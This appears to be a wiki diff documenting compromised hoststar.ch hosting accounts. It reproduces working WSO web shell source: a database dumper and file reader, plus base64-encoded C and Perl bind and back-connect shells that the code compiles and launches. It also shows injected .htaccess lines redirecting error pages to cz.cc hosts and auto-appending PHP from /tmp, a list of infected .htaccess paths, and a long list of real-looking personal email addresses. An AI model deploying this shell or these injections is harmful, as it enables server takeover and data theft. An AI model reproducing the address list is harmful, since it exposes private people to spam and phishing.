+ | $this->query('SELECT * FROM '.$table); | ||
+ | while($â = $this->fetch()) { | ||
+ | $columns = array(); | ||
+ | foreach($â as $k=>$v) { | ||
+ | $â[$k] = "'".addslashes($v)."'"; | ||
+ | $columns[] = $k; | ||
+ | } | ||
+ | $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n"; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | } | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | }; | ||
+ | $db = new DbClass($_POST['type']); | ||
+ | if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { | ||
+ | $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); | ||
+ | $db->selectdb($_POST['sql_base']); | ||
+ | switch($_POST['charset']) { | ||
+ | case "Windows-1251": $db->setCharset('cp1251'); break; | ||
+ | case "UTF-8": $db->setCharset('utf8'); break; | ||
+ | case "KOI8-R": $db->setCharset('koi8r'); break; | ||
+ | case "KOI8-U": $db->setCharset('koi8u'); break; | ||
+ | case "cp866": $db->setCharset('cp866'); break; | ||
+ | } | ||
+ | if(empty($_POST['file'])) { | ||
+ | ob_start("ob_gzhandler", 4096); | ||
+ | header("Content-Disposition: attachment; filename=dump.sql"); | ||
+ | header("Content-Type: text/plain"); | ||
+ | foreach($_POST['tbl'] as $v) | ||
+ | $db->dump($v); | ||
+ | exit; | ||
+ | } elseif($fp = @fopen($_POST['file'], 'w')) { | ||
+ | foreach($_POST['tbl'] as $v) | ||
+ | $db->dump($v, $fp); | ||
+ | fclose($fp); | ||
+ | unset($_POST['p2']); | ||
+ | } else | ||
+ | die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo " | ||
+ | <h1>Sql browser</h1><div class=content> | ||
+ | <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> | ||
+ | <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> | ||
+ | <input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> | ||
+ | <td><select name='type'><option value='mysql' "; | ||
+ | if(@$_POST['type']=='mysql')echo 'selected'; | ||
+ | echo ">MySql</option><option value='pgsql' "; | ||
+ | if(@$_POST['type']=='pgsql')echo 'selected'; | ||
+ | echo ">PostgreSql</option></select></td> | ||
+ | <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> | ||
+ | <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> | ||
+ | <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; | ||
+ | $tmp = "<input type=text name=sql_base value=''>"; | ||
+ | if(isset($_POST['sql_host'])){ | ||
+ | if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { | ||
+ | switch($_POST['charset']) { | ||
+ | case "Windows-1251": $db->setCharset('cp1251'); break; | ||
+ | case "UTF-8": $db->setCharset('utf8'); break; | ||
+ | case "KOI8-R": $db->setCharset('koi8r'); break; | ||
+ | case "KOI8-U": $db->setCharset('koi8u'); break; | ||
+ | case "cp866": $db->setCharset('cp866'); break; | ||
+ | } | ||
+ | $db->listDbs(); | ||
+ | echo "<select name=sql_base><option value=''></option>"; | ||
+ | while($â = $db->fetch()) { | ||
+ | list($key, $value) = each($â); | ||
+ | echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; | ||
+ | } | ||
+ | echo '</select>'; | ||
+ | } | ||
+ | else echo $tmp; | ||
+ | }else | ||
+ | echo $tmp; | ||
+ | echo "</td> | ||
+ | <td><input type=submit value='>>' onclick='fs(d.sf);'></td> | ||
+ | <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> | ||
+ | </tr> | ||
+ | </table> | ||
+ | <script> | ||
+ | s_db='".@addslashes($_POST['sql_base'])."'; | ||
+ | function fs(f) { | ||
+ | if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; | ||
+ | if(f.p1) f.p1.value=''; | ||
+ | if(f.p2) f.p2.value=''; | ||
+ | if(f.p3) f.p3.value=''; | ||
+ | } | ||
+ | } | ||
+ | function st(t,l) { | ||
+ | d.sf.p1.value = 'select'; | ||
+ | d.sf.p2.value = t; | ||
+ | if(l && d.sf.p3) d.sf.p3.value = l; | ||
+ | d.sf.submit(); | ||
+ | } | ||
+ | function is() { | ||
+ | for(i=0;i<d.sf.elements['tbl[]'].length;++i) | ||
+ | d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; | ||
+ | } | ||
+ | </script>"; | ||
+ | if(isset($db) && $db->link){ | ||
+ | echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; | ||
+ | if(!empty($_POST['sql_base'])){ | ||
+ | $db->selectdb($_POST['sql_base']); | ||
+ | echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; | ||
+ | $tbls_res = $db->listTables(); | ||
+ | while($â = $db->fetch($tbls_res)) { | ||
+ | list($key, $value) = each($â); | ||
+ | if(!empty($_POST['sql_count'])) | ||
+ | $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); | ||
+ | $value = htmlspecialchars($value); | ||
+ | echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; | ||
+ | } | ||
+ | echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; | ||
+ | if(@$_POST['p1'] == 'select') { | ||
+ | $_POST['p1'] = 'query'; | ||
+ | $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; | ||
+ | $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); | ||
+ | $num = $db->fetch(); | ||
+ | $pages = ceil($num['n'] / 30); | ||
+ | echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; | ||
+ | echo " of $pages"; | ||
+ | if($_POST['p3'] > 1) | ||
+ | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; | ||
+ | if($_POST['p3'] < $pages) | ||
+ | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; | ||
+ | $_POST['p3']--; | ||
+ | if($_POST['type']=='pgsql') | ||
+ | $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); | ||
+ | else | ||
+ | $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; | ||
+ | echo "<br><br>"; | ||
+ | } | ||
+ | if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { | ||
+ | $db->query(@$_POST['p2']); | ||
+ | if($db->res !== false) { | ||
+ | $title = false; | ||
+ | echo '<table width=100% cellspacing=1 cellpadding=2 class=main>'; | ||
+ | $line = 1; | ||
+ | while($â = $db->fetch()) { | ||
+ | if(!$title) { | ||
+ | echo '<tr>'; | ||
+ | foreach($â as $key => $value) | ||
+ | echo '<th>'.$key.'</th>'; | ||
+ | reset($â); | ||
+ | $title=true; | ||
+ | echo '</tr><tr>'; | ||
+ | $line = 2; | ||
+ | } | ||
+ | echo '<tr class="l'.$line.'">'; | ||
+ | $line = $line==1?2:1; | ||
+ | foreach($â as $key => $value) { | ||
+ | if($value == null) | ||
+ | echo '<td><i>null</i></td>'; | ||
+ | else | ||
+ | echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; | ||
+ | } | ||
+ | echo '</tr>'; | ||
+ | } | ||
+ | echo '</table>'; | ||
+ | } else { | ||
+ | echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; | ||
+ | } | ||
+ | } | ||
+ | echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; | ||
+ | if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) | ||
+ | echo htmlspecialchars($_POST['p2']); | ||
+ | echo "</textarea><br/><input type=submit value='Execute'>"; | ||
+ | echo "</td></tr>"; | ||
+ | } | ||
+ | echo "</table></form><br/>"; | ||
+ | if($_POST['type']=='mysql') { | ||
+ | $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); | ||
+ | if($db->fetch()) | ||
+ | echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; | ||
+ | } | ||
+ | if(@$_POST['p1'] == 'loadfile') { | ||
+ | $file = $db->loadFile($_POST['p2']); | ||
+ | echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; | ||
+ | } | ||
+ | } else { | ||
+ | echo htmlspecialchars($db->error()); | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionNetwork() { | ||
+ | hardHeader(); | ||
+ | $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; | ||
+ | $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; | ||
+ | $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; | ||
+ | $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; | ||
+ | echo "<h1>Network tools</h1><div class=content> | ||
+ | <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> | ||
+ | <span>Bind port to /bin/sh</span><br/> | ||
+ | Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'> | ||
+ | </form> | ||
+ | <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'> | ||
+ | <span>Back-connect to</span><br/> | ||
+ | Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'> | ||
+ | </form><br>"; | ||
+ | if(isset($_POST['p1'])) { | ||
+ | function cf($f,$t) { | ||
+ | $w=@fopen($f,"w") or @function_exists('file_put_contents'); | ||
+ | if($w) { | ||
+ | @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); | ||
+ | @fclose($w); | ||
+ | } | ||
+ | } | ||
+ | if($_POST['p1'] == 'bpc') { | ||
+ | cf("/tmp/bp.c",$bind_port_c); | ||
+ | $â = ex("gcc -o /tmp/bp /tmp/bp.c"); | ||
+ | @unlink("/tmp/bp.c"); | ||
+ | $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bpp') { | ||
+ | cf("/tmp/bp.pl",$bind_port_p); | ||
+ | $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bcc') { | ||
+ | cf("/tmp/bc.c",$back_connect_c); | ||
+ | $â = ex("gcc -o /tmp/bc /tmp/bc.c"); | ||
+ | @unlink("/tmp/bc.c"); | ||
+ | $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bcp') { | ||
+ | cf("/tmp/bc.pl",$back_connect_p); | ||
+ | $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>"; | ||
+ | } | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | if( empty($_POST['a']) ) | ||
+ | if(isset($â) && function_exists('action' . $â)) | ||
+ | $_POST['a'] = $â; | ||
+ | else | ||
+ | $_POST['a'] = 'FilesMan'; | ||
+ | if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) | ||
+ | call_user_func('action' . $_POST['a']); | ||
+ | ?> | ||
+ | |||
+ | </syntaxhighlight> | ||
+ | |||
+ | ---- | ||
+ | |||
+ | login-94.hoststar.ch | ||
+ | |||
+ | used smarty to upload: /home/www/confixx/html/include/template/templates_c | ||
+ | |||
+ | /home/www/confixx/html/webapps: | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | ErrorDocument 400 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 403 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 404 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 405 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 406 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 408 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 500 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 501 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 502 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 503 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 504 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 505 http://nicomagen.cz.cc/ht_er_docs/ | ||
+ | AddHandler application/x-httpd-php .html .htm | ||
+ | php_value auto_append_file "/tmp/13063658424483.php" | ||
+ | ErrorDocument 400 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 403 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 404 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 405 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 406 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 408 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 500 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 501 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 502 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 503 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 504 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | ErrorDocument 505 http://ritch60620.cz.cc/ht_er_docs/ | ||
+ | AddHandler application/x-httpd-php .html .htm | ||
+ | php_value auto_append_file "/tmp/13065345007035.php" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | for files | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | ./formmail/.htaccess | ||
+ | ./bbclone/.htaccess | ||
+ | ./nucleus/.htaccess | ||
+ | ./phpbannerexchange/.htaccess | ||
+ | ./xaraya/.htaccess | ||
+ | ./YaBB/.htaccess | ||
+ | ./bookstore/.htaccess | ||
+ | ./eGroupWare/.htaccess | ||
+ | ./zencart/.htaccess | ||
+ | ./PHProjekt/.htaccess | ||
+ | ./MovableType/.htaccess | ||
+ | ./phpwhois/.htaccess | ||
+ | ./phpSupportTickets/.htaccess | ||
+ | ./weberp/.htaccess | ||
+ | ./WebShopmanager/.htaccess | ||
+ | ./phpwebsite/.htaccess | ||
+ | ./osCommerce/.htaccess | ||
+ | ./dotproject/.htaccess | ||
+ | ./TUTOS/.htaccess | ||
+ | ./phpBugTracker/.htaccess | ||
+ | ./skins/.htaccess | ||
+ | ./phpdocumentor/.htaccess | ||
+ | ./gallery/.htaccess | ||
+ | ./WebCalendar/.htaccess | ||
+ | ./Drupal/.htaccess | ||
+ | ./Mambo/.htaccess | ||
+ | ./phpmyforum/.htaccess | ||
+ | ./Links/.htaccess | ||
+ | ./phpDig/.htaccess | ||
+ | ./phpAds/.htaccess | ||
+ | ./phpwcms/.htaccess | ||
+ | ./Care2x/.htaccess | ||
+ | ./UebiMiau/.htaccess | ||
+ | ./Tellme/.htaccess | ||
+ | ./classifieds/.htaccess | ||
+ | ./phpBBAuction/.htaccess | ||
+ | ./guestbook/.htaccess | ||
+ | ./SupportLogic/.htaccess | ||
+ | ./xoops/.htaccess | ||
+ | ./b2evolution/.htaccess | ||
+ | ./template/.htaccess | ||
+ | ./Events/.htaccess | ||
+ | ./HelpCenterLive/.htaccess | ||
+ | ./phpBook/.htaccess | ||
+ | ./SSM/.htaccess | ||
+ | ./AdvancedPoll/.htaccess | ||
+ | ./pLog/.htaccess | ||
+ | ./gtchat/.htaccess | ||
+ | ./WordPress/.htaccess | ||
+ | ./Siteframe/.htaccess | ||
+ | ./openit/.htaccess | ||
+ | ./squirrelmail/.htaccess | ||
+ | ./noahclass/.htaccess | ||
+ | ./knowledgetree/.htaccess | ||
+ | ./agoracart/.htaccess | ||
+ | ./kplaylist/.htaccess | ||
+ | ./CSLH/.htaccess | ||
+ | ./wbbook/.htaccess | ||
+ | ./phpMyFamily/.htaccess | ||
+ | ./videodb/.htaccess | ||
+ | ./PostNuke/.htaccess | ||
+ | ./vstat/.htaccess | ||
+ | ./DocFAQ/.htaccess | ||
+ | ./creloaded/.htaccess | ||
+ | ./openbiblio/.htaccess | ||
+ | ./phpnuke/.htaccess | ||
+ | ./getid/.htaccess | ||
+ | ./cubecart/.htaccess | ||
+ | ./topdownloads/.htaccess | ||
+ | ./phpsurveyor/.htaccess | ||
+ | ./pmachinefree/.htaccess | ||
+ | ./Coppermine/.htaccess | ||
+ | ./phpWiki/.htaccess | ||
+ | ./sendcard/.htaccess | ||
+ | ./phpList/.htaccess | ||
+ | ./Owl/.htaccess | ||
+ | ./escene/.htaccess | ||
+ | ./AutoIndex/.htaccess | ||
+ | ./4images/.htaccess | ||
+ | ./xrms/.htaccess | ||
+ | ./typo/.htaccess | ||
+ | ./phpMoney/.htaccess | ||
+ | ./tsep/.htaccess | ||
+ | ./osTicket/.htaccess | ||
+ | ./mediawiki/.htaccess | ||
+ | ./phpBB/.htaccess | ||
+ | ./geeklog/.htaccess | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ---- | ||
+ | |||
+ | login-97.hoststar.ch | ||
+ | |||
+ | 11.txt | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | Anna.Caldelari@giubiasco.ch | ||
+ | BACOLE@DCONET.CH | ||
+ | Bernhard.schuepbach@ontour.ch | ||
+ | E.Abt@alineabasel.ch | ||
+ | Erjona.shahinaj@hotmail.com | ||
+ | Esther@vanhest.ch | ||
+ | Gunnar@5Leos.ch | ||
+ | Gunnar@5Leos.de | ||
+ | Info@roal.ch | ||
+ | KBMASSAGE@gmx.ch | ||
+ | Liechti@hr-gastro.ch | ||
+ | Mail@peterkaeser.ch | ||
+ | REUFUSREXX@AOL.COM | ||
+ | S.Galliker@settelen.ch | ||
+ | Thomas.Schmid@psgarbon.ch | ||
+ | a.albizzati@roal.ch | ||
+ | a.ebner@delivros.ch | ||
+ | a.felzani@maler-scorpion.ch | ||
+ | a.grob@delivros.ch | ||
+ | a.hauri1@bluewin.ch | ||
+ | a.megna@maler-scorpion.ch | ||
+ | aaron.gygax@dalchenhof.ch | ||
+ | adi@centraldubs.com | ||
+ | admin@carpnet.ch | ||
+ | admin@expedition-earth.com | ||
+ | admin@svdi.ch | ||
+ | admin@wohnmobilforum-schweiz.ch | ||
+ | aknupfer@oykos.ch | ||
+ | alert@sotrasma.ch | ||
+ | alessia.zanetti@zurich.ch | ||
+ | andrea.hipp@gullo.ch | ||
+ | andrea@leupis.ch | ||
+ | andreas.gygax@dalchenhof.ch | ||
+ | andreas.hirt@vclyss.ch | ||
+ | andreas.huber@erne.net | ||
+ | angelika@5leos.ch | ||
+ | arca@famigliediurne.ch | ||
+ | argiolas.giada@gmail.com | ||
+ | armin.xylander@real-stein.ch | ||
+ | backup@sotrasma.ch | ||
+ | barbara.loria12@gmail.com | ||
+ | bartkowiak_mariola@icloud.com | ||
+ | beat-man@voodoorhythm.com | ||
+ | beatrice.roos@schafferei.com | ||
+ | bella@voodoorhythm.com | ||
+ | ben.humphries@majorplayers.co.uk | ||
+ | beni.rieder@outlet24.ch | ||
+ | bianca.bosshard@richards-gold.ch | ||
+ | blue@jane-w.ch | ||
+ | booking@voodoorhythm.com | ||
+ | buss@lutzbuss.ch | ||
+ | c.abderhalden@houseofjeans.ch | ||
+ | c.meier@meiermech.ch | ||
+ | c.wenger@royalevent.ch | ||
+ | chet@voodoorhythm.com | ||
+ | christina.schad@bzz.ch | ||
+ | christine.schuepbach@ontour.ch | ||
+ | christine.stoeckli@dalchenhof.ch | ||
+ | christof.lutz@tenac.ch | ||
+ | christoph.schuepbach@ontour.ch | ||
+ | claudia.fischer@nbs-fischer.ch | ||
+ | claudia@puntofavale.ch | ||
+ | claudine.schmidt@eldora.ch | ||
+ | claudio.ciotta@richards-gold.ch | ||
+ | corinne.deodorico@steiner-ag.ch | ||
+ | dani.balzer@gmx.net | ||
+ | dani@dconet.ch | ||
+ | daniel@swiss-consultrading.ch | ||
+ | daniela.maerki@bluewin.ch | ||
+ | daniela.zubler@coiffure-sunshine.ch | ||
+ | danilo.jacoma@roto-frank.com | ||
+ | dario@plozner.ch | ||
+ | diego.gygax@dalchenhof.ch | ||
+ | dietschi@tenac.ch | ||
+ | dkm@corporatecom.ch | ||
+ | doerfler@swissvet.ch | ||
+ | dominik.altherr@houseofjeans.ch | ||
+ | dynamica@dynamica-kurse.ch | ||
+ | e.filocamo@regazzi.ch | ||
+ | ecofon@ecofon.ch | ||
+ | eduardo@jacopino.com | ||
+ | emir.mustafa@publicitas.com | ||
+ | eric.nussbaumer@top-care.ch | ||
+ | ernestina.londino@student.supsi.ch | ||
+ | f.staeuble@srvg.ch | ||
+ | fabio.flueckiger@students.gymneufeld.ch | ||
+ | facebook@promo-shout.com | ||
+ | family@hosmann.ch | ||
+ | felix@nbs-fischer.ch | ||
+ | finanzhai@blb-selects.ch | ||
+ | fluri@fhmotorsport.ch | ||
+ | francesco@gullo.ch | ||
+ | frei@farbtupfer.ch | ||
+ | gabriella.shala@nbs-fischer.ch | ||
+ | gerald@5leos.de | ||
+ | gl@hair-free.ch | ||
+ | graziella@plozner.ch | ||
+ | gregory@chocoholics.ch | ||
+ | gs@schroeer-sell.com | ||
+ | gunnar@5leos.ch | ||
+ | h.dietrich@fluora.ch | ||
+ | hallo@irene-hofer.ch | ||
+ | hard_linux@mail.ru | ||
+ | him.jodzee@bluewin.ch | ||
+ | hufschmiede@dalchenhof.ch | ||
+ | i.dolci@orange.fr | ||
